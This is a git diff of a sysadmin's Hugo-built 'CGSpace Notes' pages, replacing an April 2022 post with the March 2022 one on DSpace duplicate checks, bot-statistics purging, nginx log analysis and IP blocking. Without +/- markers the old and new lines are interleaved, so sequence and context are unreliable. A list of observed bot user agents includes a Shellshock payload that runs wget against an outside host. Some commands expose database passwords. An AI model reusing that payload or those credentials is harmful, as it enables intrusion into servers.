<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -494,9 +494,9 @@ $ zstd statistics-2019.json
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -40,7 +40,7 @@ Purging 455 hits from WhatsApp in statistics
Total number of bot hits purged: 3679
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -577,9 +577,9 @@ Total number of bot hits purged: 3679
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -24,7 +24,7 @@ Start a full harvest on AReS
Start a full harvest on AReS
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -380,9 +380,9 @@ Start a full harvest on AReS
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -38,7 +38,7 @@ We agreed to try to do more alignment of affiliations/funders with ROR
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -724,9 +724,9 @@ isNotNull(value.match(&#39;699&#39;))
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -6,19 +6,35 @@
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta property="og:title" content="April, 2022" />
<meta property="og:description" content="2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54." />
<meta property="og:title" content="March, 2022" />
<meta property="og:description" content="2022-03-01
Send Gaia the last batch of potential duplicates for items 701 to 980:
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p &#39;fuuu&#39; -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-03/" />
<meta property="article:published_time" content="2022-03-01T10:53:39+03:00" />
<meta property="article:modified_time" content="2022-04-24T21:06:28+03:00" />
<meta property="article:published_time" content="2022-03-01T16:46:54+03:00" />
<meta property="article:modified_time" content="2022-04-04T19:15:58+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="April, 2022"/>
<meta name="twitter:description" content="2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="twitter:title" content="March, 2022"/>
<meta name="twitter:description" content="2022-03-01
Send Gaia the last batch of potential duplicates for items 701 to 980:
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p &#39;fuuu&#39; -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
"/>
<meta name="generator" content="Hugo 0.97.3" />
@ -26,11 +42,11 @@
{
"@context": "http://schema.org",
"@type": "BlogPosting",
"headline": "April, 2022",
"headline": "March, 2022",
"url": "https://alanorth.github.io/cgspace-notes/2022-03/",
"wordCount": "1261",
"datePublished": "2022-03-01T10:53:39+03:00",
"dateModified": "2022-04-24T21:06:28+03:00",
"wordCount": "1836",
"datePublished": "2022-03-01T16:46:54+03:00",
"dateModified": "2022-04-04T19:15:58+03:00",
"author": {
"@type": "Person",
"name": "Alan Orth"
@ -43,7 +59,7 @@
<link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2022-03/">
<title>April, 2022 | CGSpace Notes</title>
<title>March, 2022 | CGSpace Notes</title>
<!-- combined, minified CSS -->
@ -95,236 +111,352 @@
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">April, 2022</a></h2>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">March, 2022</a></h2>
<p class="blog-post-meta">
<time datetime="2022-03-01T10:53:39+03:00">Tue Mar 01, 2022</time>
<time datetime="2022-03-01T16:46:54+03:00">Tue Mar 01, 2022</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
</p>
</header>
<h2 id="2022-04-01">2022-04-01</h2>
<h2 id="2022-03-01">2022-03-01</h2>
<ul>
<li>I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday
<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
</span></span></code></pre></div><h2 id="2022-03-04">2022-03-04</h2>
<ul>
<li>The Discovery indexing took this long:</li>
<li>Looking over the CGSpace Solr statistics from 2022-02
<ul>
<li>I see a few new bots, though once I expanded my search for user agents with &ldquo;www&rdquo; in the name I found so many more!</li>
<li>Here are some of the more prevalent or weird ones:
<ul>
<li>axios/0.21.1</li>
<li>Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)</li>
<li>Nutraspace/Nutch-1.2 (<a href="https://www.nutraspace.com">www.nutraspace.com</a>)</li>
<li>Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; <a href="mailto:webmaster@moreover.com">webmaster@moreover.com</a>)</li>
<li>Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com</li>
<li>Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)</li>
<li>Crowsnest/0.5 (+http://www.crowsnest.tv/)</li>
<li>Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com</li>
<li>metha/0.2.27</li>
<li>ZaloPC-win32-24v454</li>
<li>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x</li>
<li>ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)</li>
<li>FullStoryBot/1.0 (+https://www.fullstory.com)</li>
<li>Link Validity Check From: <a href="http://www.usgs.gov">http://www.usgs.gov</a></li>
<li>OSPScraper (+https://www.opensyllabusproject.org)</li>
<li>() { :;}; /bin/bash -c &quot;wget -O /tmp/bbb <a href="https://www.redel.net.br/1.php?id=3137382e37392e3138372e313832">www.redel.net.br/1.php?id=3137382e37392e3138372e313832</a>&quot;</li>
</ul>
</li>
<li>I submitted <a href="https://github.com/atmire/COUNTER-Robots/pull/52">a pull request to COUNTER-Robots</a> with some of these</li>
</ul>
</li>
<li>I purged a bunch of hits from the stats using the <code>check-spider-hits.sh</code> script:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
</span></span><span style="display:flex;"><span>Purging 6 hits from scalaj-http in statistics
</span></span><span style="display:flex;"><span>Purging 5 hits from lua-resty-http in statistics
</span></span><span style="display:flex;"><span>Purging 9 hits from AHC in statistics
</span></span><span style="display:flex;"><span>Purging 7 hits from acebookexternalhit in statistics
</span></span><span style="display:flex;"><span>Purging 1011 hits from axios\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 2216 hits from Faveeo\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 1164 hits from Moreover\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 740 hits from Exploratodo\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 585 hits from GroupHigh\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 438 hits from Crowsnest\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 1326 hits from nbertaupete95 in statistics
</span></span><span style="display:flex;"><span>Purging 182 hits from metha\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 68 hits from ZaloPC-win32-24v454 in statistics
</span></span><span style="display:flex;"><span>Purging 1644 hits from Firefox\/x\.x in statistics
</span></span><span style="display:flex;"><span>Purging 678 hits from ZoteroTranslationServer in statistics
</span></span><span style="display:flex;"><span>Purging 27 hits from FullStoryBot in statistics
</span></span><span style="display:flex;"><span>Purging 26 hits from Link Validity Check in statistics
</span></span><span style="display:flex;"><span>Purging 26 hits from OSPScraper in statistics
</span></span><span style="display:flex;"><span>Purging 1 hits from 3137382e37392e3138372e313832 in statistics
</span></span><span style="display:flex;"><span>Purging 2755 hits from Nutch-[0-9] in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 12914
</span></span></code></pre></div><ul>
<li>I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project</li>
</ul>
<h2 id="2022-03-05">2022-03-05</h2>
<ul>
<li>Start AReS harvest</li>
</ul>
<h2 id="2022-03-10">2022-03-10</h2>
<ul>
<li>A few days ago Gaia sent me her notes on the fourth batch of TAC/ICW documents (items 701980 in the spreadsheet)
<ul>
<li>I created a filter in LibreOffice and selected the IDs for items with the action &ldquo;delete&rdquo;, then I created a custom text facet in OpenRefine with this GREL:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>real 334m33.625s
</span></span><span style="display:flex;"><span>user 227m51.331s
</span></span><span style="display:flex;"><span>sys 3m43.037s
</span></span></code></pre></div><h2 id="2022-04-04">2022-04-04</h2>
<pre tabindex="0"><code>or(
isNotNull(value.match(&#39;707&#39;)),
isNotNull(value.match(&#39;709&#39;)),
isNotNull(value.match(&#39;710&#39;)),
isNotNull(value.match(&#39;711&#39;)),
isNotNull(value.match(&#39;713&#39;)),
isNotNull(value.match(&#39;717&#39;)),
isNotNull(value.match(&#39;718&#39;)),
...
isNotNull(value.match(&#39;821&#39;))
)
</code></pre><ul>
<li>Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuu@ummm.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-03-10-tac-batch4-701to980.map
</span></span></code></pre></div><h2 id="2022-03-12">2022-03-12</h2>
<ul>
<li>Update all containers and rebuild OpenRXV on linode20:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
</span></span><span style="display:flex;"><span>$ docker-compose build
</span></span></code></pre></div><ul>
<li>Then run all system updates and reboot</li>
<li>Start a full harvest on AReS</li>
<li>Help Marianne with submit/approve access on a new collection on CGSpace</li>
<li>Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc)</li>
<li>Looking at the Solr statistics for 2022-03 on CGSpace
</ul>
<h2 id="2022-03-16">2022-03-16</h2>
<ul>
<li>I see 54.229.218.204 on Amazon AWS made 49,000 requests, some of which with this user agent: <code>Apache-HttpClient/4.5.9 (Java/1.8.0_322)</code>, and many others with a normal browser agent, so that&rsquo;s fishy!</li>
<li>The DSpace agent pattern <code>http.?agent</code> seems to have caught the first ones, but I&rsquo;ll purge the IP ones</li>
<li>I see 40.77.167.80 is Bing or MSN Bot, but using a normal browser user agent, and if I search Solr for <code>dns:*msnbot* AND dns:*.msn.com.</code> I see over 100,000, which is a problem I noticed a few months ago too&hellip;</li>
<li>I extracted the MSN Bot IPs from Solr using an IP facet, then used the <code>check-spider-ip-hits.sh</code> script to purge them</li>
<li>Meeting with KM/KS group to start talking about the way forward for repositories and web publishing
<ul>
<li>We agreed to form a sub-group of the transition task team to put forward a recommendation for repository and web publishing</li>
</ul>
</li>
</ul>
<h2 id="2022-04-10">2022-04-10</h2>
<h2 id="2022-03-20">2022-03-20</h2>
<ul>
<li>Start a full harvest on AReS</li>
</ul>
<h2 id="2022-04-13">2022-04-13</h2>
<h2 id="2022-03-21">2022-03-21</h2>
<ul>
<li>UptimeRobot mailed to say that CGSpace was down
<li>Review a few submissions for Open Repositories 2022</li>
<li>Test one tentative DSpace 6.4 patch and give feedback on a few more that Hrafn missed</li>
</ul>
<h2 id="2022-03-22">2022-03-22</h2>
<ul>
<li>I looked and found the load at 44&hellip;</li>
<li>I accidentally dropped the PostgreSQL database on DSpace Test, forgetting that I had all the CGIAR CAS items there
<ul>
<li>I had been meaning to update my local database&hellip;</li>
</ul>
</li>
<li>I re-imported the CGIAR CAS documents to <a href="https://dspacetest.cgiar.org/handle/10568/118432">DSpace Test</a> and generated the PDF thumbnails:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuu@ma.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-03-22-tac-700.map
</span></span><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media -p <span style="color:#e6db74">&#34;ImageMagick PDF Thumbnail&#34;</span> -i 10568/118432
</span></span></code></pre></div><ul>
<li>On my local environment I decided to run the <code>check-duplicates.py</code> script one more time with all 700 items:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/TAC_ICW_GreenCovers/2022-03-22-tac-700.csv &gt; /tmp/tac.csv
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspacetest -u dspacetest -p <span style="color:#e6db74">&#39;dom@in34sniper&#39;</span> -o /tmp/2022-03-22-tac-duplicates.csv
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW.csv &gt; /tmp/tac-filenames.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-22-tac-duplicates.csv /tmp/tac-filenames.csv &gt; /tmp/tac-final-duplicates.csv
</span></span></code></pre></div><ul>
<li>I sent the resulting 76 items to Gaia to check</li>
<li>UptimeRobot said that CGSpace was down
<ul>
<li>I looked and found many locks belonging to the REST API application:</li>
</ul>
</li>
<li>There seem to be a lot of locks from the XMLUI:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi)&#39;</span> | sort | uniq -c | sort -n
</span></span><span style="display:flex;"><span> 3173 dspaceWeb
</span></span><span style="display:flex;"><span> 301 dspaceWeb
</span></span><span style="display:flex;"><span> 2390 dspaceApi
</span></span></code></pre></div><ul>
<li>Looking at the top IPs in nginx&rsquo;s access log one IP in particular stands out:</li>
<li>Looking at nginx&rsquo;s logs, I found the top addresses making requests today:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span> 941 66.249.66.222
</span></span><span style="display:flex;"><span> 1224 95.108.213.28
</span></span><span style="display:flex;"><span> 2074 157.90.209.76
</span></span><span style="display:flex;"><span> 3064 66.249.66.221
</span></span><span style="display:flex;"><span> 95743 185.192.69.15
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> /var/log/nginx/rest.log | sort | uniq -c | sort -h
</span></span><span style="display:flex;"><span> 1977 45.5.184.2
</span></span><span style="display:flex;"><span> 3167 70.32.90.172
</span></span><span style="display:flex;"><span> 4754 54.195.118.125
</span></span><span style="display:flex;"><span> 5411 205.186.128.185
</span></span><span style="display:flex;"><span> 6826 137.184.159.211
</span></span></code></pre></div><ul>
<li>185.192.69.15 is in the UK</li>
<li>I added a block for that IP in nginx and the load went down&hellip;</li>
<li>137.184.159.211 is on DigitalOcean using this user agent: <code>GuzzleHttp/6.3.3 curl/7.81.0 PHP/7.4.28</code>
<ul>
<li>I blocked this IP in nginx and the load went down immediately</li>
</ul>
<h2 id="2022-04-16">2022-04-16</h2>
</li>
<li>205.186.128.185 is on Media Temple, but it&rsquo;s OK because it&rsquo;s the CCAFS publications importer bot</li>
<li>54.195.118.125 is on Amazon, but is also a CCAFS publications importer bot apparently (perhaps a test server)</li>
<li>70.32.90.172 is on Media Temple and has no user agent</li>
<li>What is surprising to me is that we already have an nginx rule to return HTTP 403 for requests without a user agent
<ul>
<li>Start harvest on AReS</li>
</ul>
<h2 id="2022-04-18">2022-04-18</h2>
<ul>
<li>I woke up to several notices from UptimeRobot that CGSpace had gone down and up in the night (of course I&rsquo;m on holiday out of the country for Easter)
<ul>
<li>I see there are many locks in use from the XMLUI:</li>
<li>I verified it works as expected with an empty user agent:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi)&#39;</span> | sort | uniq -c
</span></span><span style="display:flex;"><span> 8932 dspaceWeb
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -H User-Agent:<span style="color:#e6db74">&#39;&#39;</span> <span style="color:#e6db74">&#39;https://dspacetest.cgiar.org/rest/handle/10568/34799?expand=all&#39;</span>
</span></span><span style="display:flex;"><span>Due to abuse we no longer permit requests without a user agent. Please specify a descriptive user agent, for example containing the word &#39;bot&#39;, if you are accessing the site programmatically. For more information see here: https://dspacetest.cgiar.org/page/about.
</span></span></code></pre></div><ul>
<li>Looking at the top IPs making requests it seems they are Yandex, bingbot, and Googlebot:</li>
<li>I note that the nginx log shows &lsquo;-&rsquo; for a request with an empty user agent, which would be indistinguishable from a request with a &lsquo;-&rsquo;, for example these were successful:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq -c | sort -h
</span></span><span style="display:flex;"><span> 752 69.162.124.231
</span></span><span style="display:flex;"><span> 759 66.249.64.213
</span></span><span style="display:flex;"><span> 864 66.249.66.222
</span></span><span style="display:flex;"><span> 905 2a01:4f8:221:f::2
</span></span><span style="display:flex;"><span> 1013 84.33.2.97
</span></span><span style="display:flex;"><span> 1201 157.55.39.159
</span></span><span style="display:flex;"><span> 1204 157.55.39.144
</span></span><span style="display:flex;"><span> 1209 157.55.39.102
</span></span><span style="display:flex;"><span> 1217 157.55.39.161
</span></span><span style="display:flex;"><span> 1252 207.46.13.177
</span></span><span style="display:flex;"><span> 1274 157.55.39.162
</span></span><span style="display:flex;"><span> 2553 66.249.66.221
</span></span><span style="display:flex;"><span> 2941 95.108.213.28
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>70.32.90.172 - - [22/Mar/2022:11:59:10 +0100] &#34;GET /rest/handle/10568/34374?expand=all HTTP/1.0&#34; 200 10671 &#34;-&#34; &#34;-&#34;
</span></span><span style="display:flex;"><span>70.32.90.172 - - [22/Mar/2022:11:59:14 +0100] &#34;GET /rest/handle/10568/34795?expand=all HTTP/1.0&#34; 200 11394 &#34;-&#34; &#34;-&#34;
</span></span></code></pre></div><ul>
<li>One IP is using a stange user agent though:</li>
<li>I can only assume that these requests used a literal &lsquo;-&rsquo; so I will have to add an nginx rule to block those too</li>
<li>Otherwise, I see from my notes that 70.32.90.172 is the wle.cgiar.org REST API harvester&hellip; I should ask Macaroni Bros about that</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>84.33.2.97 - - [18/Apr/2022:00:20:38 +0200] &#34;GET /bitstream/handle/10568/109581/Banana_Blomme%20_2020.pdf.jpg HTTP/1.1&#34; 404 10890 &#34;-&#34; &#34;SomeRandomText&#34;
</span></span></code></pre></div><ul>
<li>Overall, it seems we had 17,000 unique IPs connecting in the last nine hours (currently 9:14AM and log file rolled over at 00:00):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>17314
</span></span></code></pre></div><ul>
<li>That&rsquo;s a lot of unique IPs, and I see some patterns of IPs in China making ten to twenty requests each
<h2 id="2022-03-24">2022-03-24</h2>
<ul>
<li>The ISPs I&rsquo;ve seen so far are ChinaNet and China Unicom</li>
<li>Maria from ABC asked about a reporting discrepancy on AReS
<ul>
<li>I think it&rsquo;s because the last harvest was over the weekend, and she was expecting to see items submitted this week</li>
</ul>
</li>
<li>I extracted all the IPs from today and resolved them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/2022-04-18-ips.txt
</span></span><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2022-04-18-ips.txt -o /tmp/2022-04-18-ips.csv
</span></span></code></pre></div><ul>
<li>The top ASNs by IP are:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">2</span> /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span> 102 GOOGLE
</span></span><span style="display:flex;"><span> 139 Maxihost LTDA
</span></span><span style="display:flex;"><span> 165 AMAZON-02
</span></span><span style="display:flex;"><span> 393 &#34;China Mobile Communications Group Co., Ltd.&#34;
</span></span><span style="display:flex;"><span> 473 AMAZON-AES
</span></span><span style="display:flex;"><span> 616 China Mobile communications corporation
</span></span><span style="display:flex;"><span> 642 M247 Ltd
</span></span><span style="display:flex;"><span> 2336 HostRoyale Technologies Pvt Ltd
</span></span><span style="display:flex;"><span> 4556 Chinanet
</span></span><span style="display:flex;"><span> 5527 CHINA UNICOM China169 Backbone
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">4</span> /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span> 139 262287
</span></span><span style="display:flex;"><span> 165 16509
</span></span><span style="display:flex;"><span> 180 204287
</span></span><span style="display:flex;"><span> 393 9808
</span></span><span style="display:flex;"><span> 473 14618
</span></span><span style="display:flex;"><span> 615 56041
</span></span><span style="display:flex;"><span> 642 9009
</span></span><span style="display:flex;"><span> 2156 203020
</span></span><span style="display:flex;"><span> 4556 4134
</span></span><span style="display:flex;"><span> 5527 4837
</span></span></code></pre></div><ul>
<li>I spot checked a few IPs from each of these and they are definitely just making bullshit requests to Discovery and HTML sitemap etc</li>
<li>I will download the IP blocks for each ASN except Google and Amazon and ban them</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS4837 https://asn.ipinfo.app/api/text/nginx/AS4134 https://asn.ipinfo.app/api/text/nginx/AS203020 https://asn.ipinfo.app/api/text/nginx/AS9009 https://asn.ipinfo.app/api/text/nginx/AS56041 https://asn.ipinfo.app/api/text/nginx/AS9808
</span></span><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>20296
</span></span></code></pre></div><ul>
